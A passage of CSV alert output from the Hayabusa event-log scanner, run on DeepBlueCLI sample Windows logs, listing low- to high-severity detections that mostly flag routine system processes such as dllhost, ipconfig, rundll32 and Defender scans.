0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:12.141 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:33.844 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:03:11.032 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:03:11.036 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:03:11.056 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:10:05.018 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:10:05.024 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:42:10.029 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:42:10.656 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:42:10.669 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:42:29.724 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:11.847 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:13.000 +00:00,IE10Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 21:45:28.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 21:45:28.156 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.156 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.250 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.250 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.281 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.281 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.375 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.375 
+00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.421 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.421 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.421 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.421 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.937 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.937 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:29.187 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:29.187 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost 
Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:29.859 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:30.031 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:30.031 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:30.140 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:31.375 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:31.375 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:40.171 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:43.671 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:43.703 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:43.828 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:43.921 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:45.417 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:45.417 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:45.886 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe 
/c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:46.517 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:46.517 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:47.330 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:58:44.730 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:58:44.730 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-21 21:59:55.339 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:00:01.654 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:00:01.685 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:00:01.716 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:11:08.334 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:24:56.194 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:24:56.194 
+00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.163 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.163 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.194 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.506 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.506 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.600 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig 
/fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.600 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.756 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.756 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.834 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.834 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File 
Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:57.381 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:57.397 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:37:26.756 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:37:26.756 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:13:00.062 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:13:02.593 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:15:59.548 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:15:59.673 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:23:16.845 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:28:51.548 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:28:51.611 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:28:51.626 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:30:51.548 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:30:51.548 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal 